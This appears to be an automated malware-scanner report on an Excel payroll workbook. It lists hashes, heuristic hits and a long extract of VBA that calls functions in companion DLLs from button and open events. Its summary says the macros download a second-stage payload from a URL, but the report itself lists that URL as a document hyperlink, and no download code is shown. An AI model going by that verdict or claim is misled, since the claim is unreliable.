Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 4723d7c3fde36eae…

MALICIOUS

Office (OOXML)

4.24 MB Created: 2001-05-21 17:08:32 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-05-29
MD5: 7de43e6e53ece53b9af4687461e5925a SHA-1: 4283a735c2479a0c23b1da3cab3def525ceab4d7 SHA-256: 4723d7c3fde36eae77cccccedb42a51cbeedca8d082ac86788d27ad7fcc3da1b
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The file is an OOXML document containing multiple VBA macros, including Workbook_Open and Auto_Open, indicating malicious intent. The macros utilize CreateObject and CallByName, common for executing arbitrary code. The presence of external DLL calls and an embedded URL suggests the macro's purpose is to download and execute a second-stage payload from 'http://www.excelpayroll.org/'. The specific DLL names 'PayrollBook_xlsm_64.dll' and 'PayrollBook_xlsm_32.dll' are also noted as potential IOCs.

Heuristics 11

  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Function d3e0409gf(ByVal z2duchqt1 As String, ByVal a4d41rno78vloe5 As String)
    Set d3e0409gf = CreateObject(z2duchqt1, a4d41rno78vloe5)
    End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Case 0
    u0qbxj836sab = CallByName(d0x2mkvin7leqdf, h0aelf8c63rmu87, o4yc0bivd)
    Case 1
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    #End If
    Private Sub Workbook_Open()
    [DNXVBC_COMPILED_VBA_DLL_INFO="Mj9tZGxrbjd1dDRqP1BheXJvbGxCb29rX3hsc20="]
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Option Private Module
    Private Sub auto_open()
    f1zj1r2twed06iz
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    End Function
    Private Sub auto_close()
    On Error Resume Next
  • External relationship medium OOXML_EXTERNAL_REL
    External target in xl/externalLinks/_rels/externalLink1.xml.rels: /Users/Daniel/Documents/Document/Program/ExcelBookTest/ExcelBook-V1.12/APBook.xlsm
  • External hyperlinks (2) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 2 external hyperlinks — clickable URLs are stored as external relationships. First target: mailto:triumph123!@#?
  • Hidden worksheet (veryHidden, hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 43 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.excelpayroll.org/ Document hyperlink

Extracted artifacts 32

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 78604 bytes
SHA-256: 5a654d7ef646ac7ec1e3974d51c51a23469cb597491e9b09bcca38388111eb33
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet15"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CheckBox1, 51, 3, MSForms, CheckBox"
Attribute VB_Control = "Earningtype, 35, 4, MSForms, ComboBox"
Attribute VB_Control = "ComboBox1, 36, 5, MSForms, ComboBox"
Attribute VB_Control = "ComboBox2, 37, 6, MSForms, ComboBox"
Attribute VB_Control = "ComboBox3, 38, 7, MSForms, ComboBox"
Attribute VB_Control = "ComboBox4, 39, 8, MSForms, ComboBox"
Attribute VB_Control = "ComboBox5, 40, 9, MSForms, ComboBox"
Attribute VB_Control = "ComboBox6, 41, 10, MSForms, ComboBox"
Attribute VB_Control = "ComboBox7, 42, 11, MSForms, ComboBox"
Attribute VB_Control = "ComboBox8, 43, 12, MSForms, ComboBox"
Attribute VB_Control = "CheckBox2, 53, 13, MSForms, CheckBox"
Attribute VB_Control = "CheckBox3, 54, 14, MSForms, CheckBox"
Attribute VB_Control = "CheckBox4, 55, 15, MSForms, CheckBox"
#If Win64 Then
Private Declare PtrSafe Sub k2i3m36i Lib "PayrollBook_xlsm_64.dll" Alias "f6w375flaic" (ByVal Target As Range)
Private Declare PtrSafe Sub h0b1bxn8fy41xp Lib "PayrollBook_xlsm_64.dll" Alias "p7c1dg2u5x" ()
Private Declare PtrSafe Sub i1xnyko3 Lib "PayrollBook_xlsm_64.dll" Alias "r4bqpnqw2ym3" ()
Private Declare PtrSafe Sub n7j9ft7qskymq Lib "PayrollBook_xlsm_64.dll" Alias "y3lvtpxp5fs4j8g" ()
#Else
Private Declare Sub k2i3m36i Lib "PayrollBook_xlsm_32.dll" Alias "m2xrah5ps18udy9@4" (ByVal Target As Range)
Private Declare Sub h0b1bxn8fy41xp Lib "PayrollBook_xlsm_32.dll" Alias "i0gj1bw6@0" ()
Private Declare Sub i1xnyko3 Lib "PayrollBook_xlsm_32.dll" Alias "b2ncbd5cms@0" ()
Private Declare Sub n7j9ft7qskymq Lib "PayrollBook_xlsm_32.dll" Alias "i3vav7h4z8aje4@0" ()
#End If
Private Sub CommandButton1_Click()
h0b1bxn8fy41xp
End Sub
Private Sub PayProcess_Click()
i1xnyko3
End Sub
Private Sub ShowNet_Click()
n7j9ft7qskymq
End Sub
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
k2i3m36i Target
End Sub


Attribute VB_Name = "Sheet13"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Return1, 16, 0, MSForms, CommandButton"
Attribute VB_Control = "Addarecord, 15, 1, MSForms, CommandButton"
#If Win64 Then
Private Declare PtrSafe Sub i4sb3vi9ymhevi Lib "PayrollBook_xlsm_64.dll" Alias "m2jba39aqh7pt" (ByVal Target As Range)
Private Declare PtrSafe Sub d7j3hqp9tg Lib "PayrollBook_xlsm_64.dll" Alias "o2m1l89pn1wf4" ()
Private Declare PtrSafe Sub h4o4b4ubshrjo34 Lib "PayrollBook_xlsm_64.dll" Alias "p5cy0lqajzjogd8" ()
#Else
Private Declare Sub i4sb3vi9ymhevi Lib "PayrollBook_xlsm_32.dll" Alias "i8jcyx7jb@4" (ByVal Target As Range)
Private Declare Sub d7j3hqp9tg Lib "PayrollBook_xlsm_32.dll" Alias "m2mjf7nap5i2fhe@0" ()
Private Declare Sub h4o4b4ubshrjo34 Lib "PayrollBook_xlsm_32.dll" Alias "p2zdtajrdey9lo4@0" ()
#End If
Private Sub Addarecord_Click()
d7j3hqp9tg
End Sub
Private Sub Return1_Click()
h4o4b4ubshrjo34
End Sub
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
i4sb3vi9ymhevi Target
End Sub


Attribute VB_Name = "Sheet12"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Return1, 12, 0, MSForms, CommandButton"
Attribute VB_Control = "Update1, 11, 1, MSForms, CommandButton"
#If Win64 Then
Private Declare PtrSafe Sub p5qon3ebov1i5xa Lib "PayrollBook_xlsm_64.dll" Alias "c5pgdgh0nv" (ByVal Button As Integer,ByVal Shift As Integer,ByVal X As Single,ByVal Y As Single)
Private Declare PtrSafe Sub o0qrum813f Lib "PayrollBook_xlsm_64.dll" Alias "k0aj0jmn1" ()
Private Declare PtrSafe Sub h8nb3bcmw Lib "PayrollBook_xlsm_64.dll" Alias "k4q9wb456f1c0" (ByVal Target As Range)
Private Declare PtrSafe Sub m5ydyqf7 Lib "PayrollBook_xlsm_64.dll" Alias "x3e5fv9o" ()
#Else
Private Declare Sub p5qon3ebov1i5xa Lib "PayrollBook_xlsm_32.dll" Alias "d2uhrv49h6c7kq@16" (ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
Private Declare Sub o0qrum813f Lib "PayrollBook_xlsm_32.dll" Alias "f1eaqyhpf1n8x@0" ()
Private Declare Sub h8nb3bcmw Lib "PayrollBook_xlsm_32.dll" Alias "z4hku3qsqlx18e5@4" (ByVal Target As Range)
Private Declare Sub m5ydyqf7 Lib "PayrollBook_xlsm_32.dll" Alias "k2vd6hczvqm9i1n@0" ()
#End If
Private Sub Image1_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
p5qon3ebov1i5xa Button, Shift, X, Y
End Sub
Private Sub Return1_Click()
m5ydyqf7
End Sub
Private Sub Update1_Click()
o0qrum813f
End Sub
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
h8nb3bcmw Target
End Sub


Attribute VB_Name = "Sheet11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "ViewEmployees, 27, 3, MSForms, Image"
Attribute VB_Control = "Reviewrecord, 28, 4, MSForms, Image"
Attribute VB_Control = "ViewRegister, 29, 5, MSForms, Image"
Attribute VB_Control = "JournalEntry, 30, 6, MSForms, Image"
#If Win64 Then
Private Declare PtrSafe Sub h1p4nlhi1ha6h Lib "PayrollBook_xlsm_64.dll" Alias "a8gf3p4vo" ()
Private Declare PtrSafe Sub a8kry4cj Lib "PayrollBook_xlsm_64.dll" Alias "b5icy81sfs29" ()
Private Declare PtrSafe Sub m7f6xncrdx6ygr Lib "PayrollBook_xlsm_64.dll" Alias "d3pyc2u1t" ()
Private Declare PtrSafe Sub w2n12dnun Lib "PayrollBook_xlsm_64.dll" Alias "g3vwnwy3t" ()
Private Declare PtrSafe Sub i3iosohyoab0 Lib "PayrollBook_xlsm_64.dll" Alias "g6lcy8xdl" ()
Private Declare PtrSafe Sub a2ymhxceip7 Lib "PayrollBook_xlsm_64.dll" Alias "h1dtlj6xfbepeji" (ByVal Button As Integer,ByVal Shift As Integer,ByVal X As Single,ByVal Y As Single)
Private Declare PtrSafe Sub p0ajrv4w Lib "PayrollBook_xlsm_64.dll" Alias "j4opvzqnkykui4" (ByVal Button As Integer,ByVal Shift As Integer,ByVal X As Single,ByVal Y As Single)
Private Declare PtrSafe Sub g8klb2svo6j Lib "PayrollBook_xlsm_64.dll" Alias "j4x5q5bxt1" ()
Private Declare PtrSafe Sub h6upfzu6qn Lib "PayrollBook_xlsm_64.dll" Alias "s5amfdicslefn0" ()
Private Declare PtrSafe Sub z6fdp81oaq0pr9 Lib "PayrollBook_xlsm_64.dll" Alias "t8jre6xmy0eqs4v" ()
Private Declare PtrSafe Sub n7x92vd0jodmr6x Lib "PayrollBook_xlsm_64.dll" Alias "u6ogmyn13sqy" ()
Private Declare PtrSafe Sub f5w363bg1 Lib "PayrollBook_xlsm_64.dll" Alias "w7j3unc9b0xuze7" (ByVal Target As Range)
Private Declare PtrSafe Sub t2tvt5qa Lib "PayrollBook_xlsm_64.dll" Alias "z8gqughk4" ()
#Else
Private Declare Sub h1p4nlhi1ha6h Lib "PayrollBook_xlsm_32.dll" Alias "j6gq307epb35@0" ()
Private Declare Sub a8kry4cj Lib "PayrollBook_xlsm_32.dll" Alias "o8yle25j@0" ()
Private Declare Sub m7f6xncrdx6ygr Lib "PayrollBook_xlsm_32.dll" Alias "j4sp87bc@0" ()
Private Declare Sub w2n12dnun Lib "PayrollBook_xlsm_32.dll" Alias "n1jsbm5t0ravx9d@0" ()
Private Declare Sub i3iosohyoab0 Lib "PayrollBook_xlsm_32.dll" Alias "m4ti0wvuzgveu@0" ()
Private Declare Sub a2ymhxceip7 Lib "PayrollBook_xlsm_32.dll" Alias "d3oxa7o7sfa1hcw@16" (ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
Private Declare Sub p0ajrv4w Lib "PayrollBook_xlsm_32.dll" Alias "g6ugarz4f@16" (ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
Private Declare Sub g8klb2svo6j Lib "PayrollBook_xlsm_32.dll" Alias "q3ntla9ye9m4db@0" ()
Private Declare Sub h6upfzu6qn Lib "PayrollBook_xlsm_32.dll" Alias "m4usrfmptxung0@0" ()
Private Declare Sub z6fdp81oaq0pr9 Lib "PayrollBook_xlsm_32.dll" Alias "w4n54292epycx1@0" ()
Private Declare Sub n7x92vd0jodmr6x Lib "PayrollBook_xlsm_32.dll" Alias "s2l8p07c1g3@0" ()
Private Declare Sub f5w363bg1 Lib "PayrollBook_xlsm_32.dll" Alias "g4e80zoc@4" (ByVal Target As Range)
Private Declare Sub t2tvt5qa Lib "PayrollBook_xlsm_32.dll" Alias "x5gjdtu084dz@0" ()
#End If
Option Explicit
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
f5w363bg1 Target
End Sub
Private Sub Addemployee_Click()
i3iosohyoab0
End Sub
Private Sub DataEntry1_Click()
n7x92vd0jodmr6x
End Sub
Private Sub Deleteemployee_Click()
m7f6xncrdx6ygr
End Sub
Private Sub Editemployee_Click()
a8kry4cj
End Sub
Private Sub Image1_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
a2ymhxceip7 Button, Shift, X, Y
End Sub
Private Sub Image2_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
p0ajrv4w Button, Shift, X, Y
End Sub
Private Sub JournalEntry_Click()
h1p4nlhi1ha6h
End Sub
Private Sub Payinbatch_Click()
z6fdp81oaq0pr9
End Sub
Private Sub Qreport_Click()
g8klb2svo6j
End Sub
Private Sub Reviewrecord_Click()
t2tvt5qa
End Sub
Private Sub ViewEmployees_Click()
w2n12dnun
End Sub
Private Sub ViewRegister_Click()
h6upfzu6qn
End Sub


Attribute VB_Name = "Sheet31"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Help, 8, 2, MSForms, Image"
#If Win64 Then
Private Declare PtrSafe Sub g2bpe7kjpajier Lib "PayrollBook_xlsm_64.dll" Alias "f6f9rl9fk4k" ()
Private Declare PtrSafe Sub y0uayz2grcdc Lib "PayrollBook_xlsm_64.dll" Alias "m0k91m3gq0403" ()
Private Declare PtrSafe Sub a0cmlbp7nwi9 Lib "PayrollBook_xlsm_64.dll" Alias "t8tn6m132zo" ()
Private Declare PtrSafe Sub g6i06bw7kze Lib "PayrollBook_xlsm_64.dll" Alias "y3ign8ga" ()
Private Declare PtrSafe Sub w1m1pytq Lib "PayrollBook_xlsm_64.dll" Alias "z7ya0o8ebhspv" ()
#Else
Private Declare Sub g2bpe7kjpajier Lib "PayrollBook_xlsm_32.dll" Alias "x0ru8pcsaj5c1s9@0" ()
Private Declare Sub y0uayz2grcdc Lib "PayrollBook_xlsm_32.dll" Alias "b6zfpjfm3icl87@0" ()
Private Declare Sub a0cmlbp7nwi9 Lib "PayrollBook_xlsm_32.dll" Alias "b8rnro2u2@0" ()
Private Declare Sub g6i06bw7kze Lib "PayrollBook_xlsm_32.dll" Alias "w3cp5vid3qz95az@0" ()
Private Declare Sub w1m1pytq Lib "PayrollBook_xlsm_32.dll" Alias "s8w2idnb2@0" ()
#End If
Private Sub Comsetup_Click()
a0cmlbp7nwi9
End Sub
Private Sub Costing_Click()
y0uayz2grcdc
End Sub
Private Sub Help_Click()
w1m1pytq
End Sub
Private Sub Payroll_Click()
g6i06bw7kze
End Sub
Private Sub Taxrate_Click()
g2bpe7kjpajier
End Sub


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If Win64 Then
Private Declare PtrSafe Sub z2tgl785maf Lib "PayrollBook_xlsm_64.dll" Alias "z2tgl785maf" (ByVal c As Integer)
Private Declare PtrSafe Sub r3kbus31u Lib "PayrollBook_xlsm_64.dll" Alias "p2k59ilv2u2d" ()
#Else
Private Declare Sub z2tgl785maf Lib "PayrollBook_xlsm_32.dll" Alias "z2tgl785maf@4" (ByVal c As Integer)
Private Declare Sub r3kbus31u Lib "PayrollBook_xlsm_32.dll" Alias "j0fn5jhkd9w@0" ()
#End If
Private Sub Workbook_Open()
[DNXVBC_COMPILED_VBA_DLL_INFO="Mj9tZGxrbjd1dDRqP1BheXJvbGxCb29rX3hsc20="]
j2s6gb3a3zm049m
r3kbus31u
End Sub
Private Sub Workbook_BeforeClose(ByRef Cancel As Boolean)
If r5id1lq4a() Then
z2tgl785maf Cancel
End If
End Sub


Attribute VB_Name = "Sheet41"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet40"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet38"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet35"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet36"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet37"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet39"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet14"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet17"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet18"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet19"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet20"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet25"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet16"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet21"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If Win64 Then
Private Declare PtrSafe Sub v7q2ftgdiugjo Lib "PayrollBook_xlsm_64.dll" Alias "o7yxf042fjuq407" (ByVal Target As Range)
#Else
Private Declare Sub v7q2ftgdiugjo Lib "PayrollBook_xlsm_32.dll" Alias "b3i9bxdtm76gl@4" (ByVal Target As Range)
#End If
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
v7q2ftgdiugjo Target
End Sub


Attribute VB_Name = "Sheet32"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet23"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Label29, 44, 0, MSForms, Label"
Attribute VB_Control = "Label28, 43, 1, MSForms, Label"
Attribute VB_Control = "Label27, 42, 2, MSForms, Label"
Attribute VB_Control = "Label26, 41, 3, MSForms, Label"
Attribute VB_Control = "Label25, 40, 4, MSForms, Label"
Attribute VB_Control = "Label24, 39, 5, MSForms, Label"
Attribute VB_Control = "Label23, 38, 6, MSForms, Label"
Attribute VB_Control = "Label22, 37, 7, MSForms, Label"
Attribute VB_Control = "Label21, 36, 8, MSForms, Label"
Attribute VB_Control = "Label20, 35, 9, MSForms, Label"
Attribute VB_Control = "Label19, 34, 10, MSForms, Label"
Attribute VB_Control = "Label18, 33, 11, MSForms, Label"
Attribute VB_Control = "Label17, 32, 12, MSForms, Label"
Attribute VB_Control = "Label16, 31, 13, MSForms, Label"
Attribute VB_Control = "Label15, 30, 14, MSForms, Label"
Attribute VB_Control = "Label14, 29, 15, MSForms, Label"
Attribute VB_Control = "Label13, 28, 16, MSForms, Label"
Attribute VB_Control = "Label12, 27, 17, MSForms, Label"
Attribute VB_Control = "Label11, 26, 18, MSForms, Label"
Attribute VB_Control = "Label10, 25, 19, MSForms, Label"
Attribute VB_Control = "Label9, 24, 20, MSForms, Label"
Attribute VB_Control = "Label8, 23, 21, MSForms, Label"
Attribute VB_Control = "Label7, 22, 22, MSForms, Label"
Attribute VB_Control = "Label6, 21, 23, MSForms, Label"
Attribute VB_Control = "Label5, 20, 24, MSForms, Label"
Attribute VB_Control = "Label4, 19, 25, MSForms, Label"
Attribute VB_Control = "Label3, 18, 26, MSForms, Label"
Attribute VB_Control = "Label2, 17, 27, MSForms, Label"
Attribute VB_Control = "Label1, 16, 28, MSForms, Label"
Attribute VB_Control = "Label30, 45, 29, MSForms, Label"
Attribute VB_Control = "Label31, 46, 30, MSForms, Label"
Attribute VB_Control = "Label32, 47, 31, MSForms, Label"
Attribute VB_Control = "Label33, 48, 32, MSForms, Label"

Attribute VB_Name = "Sheet9"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Label1, 1, 2, MSForms, Label"
Attribute VB_Control = "Label2, 2, 3, MSForms, Label"
Attribute VB_Control = "Label3, 3, 4, MSForms, Label"
Attribute VB_Control = "Label4, 4, 5, MSForms, Label"
Attribute VB_Control = "Label5, 5, 6, MSForms, Label"
Attribute VB_Control = "Label6, 6, 7, MSForms, Label"
Attribute VB_Control = "Label7, 7, 8, MSForms, Label"
Attribute VB_Control = "Label8, 8, 9, MSForms, Label"
Attribute VB_Control = "Label9, 9, 10, MSForms, Label"
Attribute VB_Control = "Label10, 10, 11, MSForms, Label"
Attribute VB_Control = "Label11, 11, 12, MSForms, Label"
Attribute VB_Control = "Label12, 12, 13, MSForms, Label"
Attribute VB_Control = "Label13, 13, 14, MSForms, Label"
Attribute VB_Control = "Label14, 14, 15, MSForms, Label"
Attribute VB_Control = "Label15, 15, 16, MSForms, Label"
Attribute VB_Control = "Label17, 17, 17, MSForms, Label"
Attribute VB_Control = "Label18, 18, 18, MSForms, Label"
Attribute VB_Control = "Label19, 19, 19, MSForms, Label"
Attribute VB_Control = "Label20, 20, 20, MSForms, Label"
Attribute VB_Control = "Label21, 21, 21, MSForms, Label"
Attribute VB_Control = "Label23, 31, 22, MSForms, Label"
Attribute VB_Control = "Label24, 32, 23, MSForms, Label"
Attribute VB_Control = "Label25, 33, 24, MSForms, Label"
Attribute VB_Control = "Label26, 34, 25, MSForms, Label"
Attribute VB_Control = "Label27, 35, 26, MSForms, Label"

Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet10"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet22"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet24"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Auto, 16, 0, MSForms, CheckBox"
#If Win64 Then
